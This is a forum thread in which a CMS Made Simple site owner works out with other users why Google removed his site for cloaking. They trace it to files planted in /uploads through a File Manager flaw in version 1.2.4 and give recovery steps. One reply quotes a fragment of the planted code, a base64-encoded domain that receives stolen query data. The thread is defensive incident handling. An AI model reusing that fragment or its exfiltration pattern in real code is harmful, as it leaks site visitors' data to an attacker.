Resolved: Removed from Google index/cloaking question

[jimbowes]

Hi,

I have a CMSMS site that has been working well.

This morning I had a message from Google saying we were being removed from the index due to content that broke their guidelines - which they thought was the site being hacked/cloaking.

The site displays fine to me (http://www.josaka.com) and I was wondering if anyone had any expereince/help that could help me see if we have been hacked and what I can do to solve it.

There are search engine specific browser detects in my index.php - are they meant to be there?

Any help apprecaited.

Jim

Update:

I found a file in /uploads with this code in:

Code: Select all

xxxxxxxxxxxxxxxxxxxxxxxxxxx

Seems a bit odd?

[scooper]

As I guess you've realised since the site is currently down 'due to a security issue' you have been hacked.

See http://forum.cmsmadesimple.org/index.php/topic,22516.msg109186.html#msg109186 for a start, and then there's plenty of other information on this forum about tightening up security.

[jimbowes]

Yeah I used Google tools and found some weird external links - I think based in the uploads directory and the above file being what was left.

I'm still not entirely sure what the code is doing - I think creating advertising links for some supposed antivirus software - but I'm not sure how this affected users as I can still see the homepage fine (if I want to).

I've taken the site down while I work out what has happened.

Jim

[scooper]

I'm still not entirely sure what the code is doing - I think creating advertising links for some supposed antivirus software - but I'm not sure how this affected users as I can still see the homepage fine (if I want to).

My guess would be stealing passwords .

By the looks of things it's sending query strings back to 'oucha.net' (that's what the base64_decode(b3VjaGEubmV0); line says) that probably includes your login if you logged in when it was active.

Best choose some new passwords....

[jimbowes]

Does this suggest they onlu have access to the CMSMS passwords and not the db?

Do you know how they got the file there in the first place?/What the exploit in 1.24 is?

Jim

[scooper]

The 1.2.4 exploit (in the versions I've seen) also added some lines to the config.php so that code was called each time a page was loaded. If that's the case with you then you should definitely assume that the hacker had access to your config and your db password has been compromised.

I have also seen sites where scripts were uploaded to the uploads directory but the config.php file hadn't been amended (because the file permissions were correct) - in those cases it might be that the db password hasn't been accessed... but...

You know what I'm going to say. You should assume the worst and you do need to change your db passwords as well.

I don't know too many details about the exploit but it used a problem in the the File Manager which allowed people to upload files to the server. Those files could then be run to do a variety of things including making changes to the config.php file if the permissions had not been reset correctly after an upgrade or an install.

[alby]

Does this suggest they onlu have access to the CMSMS passwords and not the db?

Do you know how they got the file there in the first place?/What the exploit in 1.24 is?

No, in query string  there are not credentials login
But is much dangerous because a script (it's one?) can always read config.php
In 1.2.4 there is a problem in a java applet of FileManager

1. Backup of your site with a tool that mantain date files
2. Backup your DB
3. Save your web access/error logs
This operations are for check exploit

now, delete full tree of your site, upload new version of CMSMS, touch config.php, restore a prev backup and call /install/index.php without write tables (in step 3 I think)

Alby

[jimbowes]

Thanks for the replies. the config.php looks unchanged. I and going to do a fresh install on a new database and then restore the database.

Jim

[jimbowes]

Thanks for the help. I have the site on a different server, different host and all new passwords. I don't think there was anything in the db that shouldn't have been. Hopefully that's fixed it.

Jim